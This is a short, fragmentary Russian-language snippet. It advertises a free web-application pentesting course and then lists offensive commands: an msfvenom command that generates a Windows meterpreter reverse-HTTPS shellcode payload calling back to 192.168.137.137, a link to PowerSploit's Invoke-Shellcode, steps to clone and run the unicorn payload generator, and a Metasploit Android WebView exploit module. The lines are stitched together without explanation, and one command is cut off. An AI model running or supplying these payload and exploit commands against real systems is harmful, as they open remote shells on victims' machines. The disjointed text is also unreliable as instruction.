Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе
https://github.com/cheetz/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1
msfvenom -p windows/meterpreter/reverse_https lport=1337 lhost=192.168.137.137 -b \0x0a\0x0b\0xff -f c
git clone https://github.com/trustedsec/unicorn.git
python unicorn.py...
use exploit/android/browser/webview_addjavascriptinterface